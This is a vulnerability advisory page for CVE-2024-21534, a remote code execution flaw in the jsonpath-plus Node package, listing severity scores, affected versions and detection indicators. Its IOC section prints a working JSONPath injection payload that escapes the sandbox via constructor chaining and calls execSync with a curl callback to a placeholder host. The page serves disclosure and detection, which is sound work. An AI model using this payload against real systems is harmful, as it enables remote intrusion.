cbcvebase.
CVE-2024-21534
published 2024-10-11

CVE-2024-21534: All versions of the package jsonpath-plus are vulnerable to Remote Code Execution (RCE) due to improper input sanitization. An attacker can execute aribitrary…

PriorityP274critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
EXPLOIT
EPSS
9.08%
94.7th percentile
All versions of the package jsonpath-plus are vulnerable to Remote Code Execution (RCE) due to improper input sanitization. An attacker can execute aribitrary code on the system by exploiting the unsafe default usage of vm in Node. **Note:** There were several attempts to fix it in versions [10.0.0-10.1.0](https://github.com/JSONPath-Plus/JSONPath/compare/v9.0.0...v10.1.0) but it could still be exploited using [different payloads](https://github.com/JSONPath-Plus/JSONPath/issues/226).

Detection & IOCsextracted from sources · hover to see the quote

command$..[?(p="console.log(this.process.mainModule.require('child_process').execSync('curl {{interactsh-url}}').toString())";Ethan=''[['constructor']][['constructor']](p);Ethan())]
  • Exploit payload targets POST endpoints accepting JSON body with a 'path' key containing a JSONPath expression that abuses constructor chaining to escape eval='safe' mode and execute arbitrary code via child_process.execSync
  • Detection via out-of-band DNS callback: successful exploitation triggers a DNS lookup to an interactsh/canary URL embedded in the payload via curl
  • HTTP response body containing '"result":' on targeted endpoints indicates the JSONPath query was processed, confirming a vulnerable jsonpath-plus instance
  • Exploit leverages constructor chain pattern ''[['constructor']][['constructor']](p) to break out of the safe eval sandbox — monitor for this string pattern in incoming JSON POST bodies
  • Vulnerability is triggered by unsafe default usage of eval='safe' mode in jsonpath-plus; this is an incomplete fix for CVE-2024-21534 which originally abused the vm module in Node.js
  • Original CVE-2024-21534 vector used Node.js vm module abuse; multiple bypass payloads exist even after partial fixes in versions 10.0.0–10.1.0 — treat all jsonpath-plus < 10.3.0 as exploitable
  • ·The vulnerability requires jsonpath-plus to be used with its unsafe default eval='safe' mode; applications that explicitly disable eval or do not pass user-controlled input to JSONPath queries are not exploitable
  • ·Red Hat downgraded impact to low because no code paths in their affected products allow exploitation, and in OpenShift AI the direct dependency's feature requiring jsonpath-plus is never loaded
  • ·CVE-2024-21534 originally abused the Node.js vm module; partial fixes in 10.0.0–10.1.0 were bypassed, meaning detection rules targeting only the original vm-based payload pattern will miss newer constructor-chain variants

CVSS provenance

nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
ghsa9.8CRITICAL
osv9.8CRITICAL
vulncheck9.8CRITICAL
vendor_redhat9.8CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.